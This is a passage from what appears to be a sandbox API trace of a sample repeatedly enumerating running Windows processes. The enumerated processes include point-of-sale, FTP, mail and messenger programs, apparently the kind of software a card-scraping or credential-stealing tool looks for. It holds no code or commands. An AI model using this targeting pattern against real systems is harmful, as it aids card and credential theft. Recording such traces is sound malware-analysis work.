hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0109.236] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0109.238] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.240] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0109.242] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0109.244] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0109.246] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0109.248] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.251] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0109.252] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0109.254] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0109.256] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0109.258] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0109.259] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0109.260] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-red.exe")) returned 1 [0109.262] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="what_drive_decide.exe")) returned 1 [0109.263] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="truth-statement.exe")) returned 1 [0109.264] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="let_dark.exe")) returned 1 [0109.270] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="safe somebody.exe")) returned 1 [0109.272] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="singthatheart.exe")) returned 1 [0109.274] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="low.exe")) returned 1 [0109.275] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="apply-would.exe")) returned 1 [0109.277] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="of-official.exe")) returned 1 [0109.279] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x484, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="billion.exe")) returned 1 [0109.280] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="newsignsister.exe")) returned 1 [0109.282] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="present-agree.exe")) returned 1 [0109.284] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="article.exe")) returned 1 [0109.285] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="populationread.exe")) returned 1 [0109.287] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="play-religious.exe")) returned 1 [0109.288] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="look.exe")) returned 1 [0109.289] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="love.exe")) returned 1 [0109.291] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel final.exe")) returned 1 [0109.292] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0109.294] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0109.296] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0109.297] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0109.299] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0109.300] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0109.302] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1024, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0109.304] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0109.305] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0109.307] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0109.308] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0109.310] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x106c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0109.313] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0109.315] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0109.316] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0109.318] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0109.319] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0109.321] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0109.322] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0109.324] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0109.326] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0109.328] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0109.329] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0109.331] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0109.332] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0109.334] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0109.335] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0109.337] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0109.338] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0109.340] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0109.341] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0109.346] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0109.347] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0109.348] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0109.350] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0109.351] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0109.352] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0109.354] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0109.355] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0109.357] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0109.358] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1228, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0109.363] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0109.364] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0109.366] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x344, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0109.367] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x344, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0109.368] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="HxTsr.exe")) returned 1 [0109.370] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1384, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0109.371] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0109.373] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0109.374] CloseHandle (hObject=0x2154) returned 1 [0109.374] Sleep (dwMilliseconds=0x64) [0109.485] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2140 [0109.494] Process32First (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.496] Process32Next (in: hSnapshot=0x2140, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, 